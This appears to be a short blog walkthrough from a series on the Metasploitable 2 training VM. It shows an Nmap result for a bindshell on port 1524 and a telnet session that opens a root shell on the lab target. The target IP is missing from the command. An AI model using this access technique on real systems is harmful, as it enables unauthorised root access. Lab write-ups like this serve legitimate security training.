Metasploitable 2 server: Gaining rootshell from bindshell service

Goal: Gain root shell using telnet.

In my previous blog, we exploited the target using a Brute-force attack. In this chapter, we are going to gain root access from the bind shell.

From Nmap scanning, we have found that the bind shell service opens on port no: 1524.

1524/tcp open  bindshell   Metasploitable root shell

It is easy to gain access to the Linux shell by the following command:

└──╼ $telnet 1524
Connected to
Escape character is '^]'.
root@metasploitable:/# uname -r
root@metasploitable:/# root@metasploitable:/# uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Post a Comment

If you have any doubts or any queries you can specify here.

Previous Post Next Post